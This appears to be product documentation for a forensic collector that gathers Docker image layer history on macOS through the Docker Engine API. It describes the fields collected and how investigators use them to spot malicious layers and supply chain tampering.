Docker Image History
Overview
Section titled “Overview”Evidence: Docker Image History
Description: Collect Docker Image History
Category: Applications
Platform: macos
Short Name: dockimagehist
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No
Background
Section titled “Background”Docker image history shows the layered build steps and commands used to construct an image. This forensic data reveals how an image was built, what software was installed, files added, and configuration changes made during image creation.
Data Collected
Section titled “Data Collected”This collector gathers structured data about docker image history.
Collection Method
Section titled “Collection Method”This collector queries the Docker daemon via Docker Engine API to retrieve the build history of each image. It extracts layer ID, created time, created by command, size, and tags for each layer in the image’s history.
Forensic Value
Section titled “Forensic Value”Image history exposes malicious commands embedded in image layers, such as backdoor installations, credential theft scripts, or cryptominer deployments. Investigators can identify suspicious layers, trace image lineage, and detect tampering or supply chain attacks in containerized environments.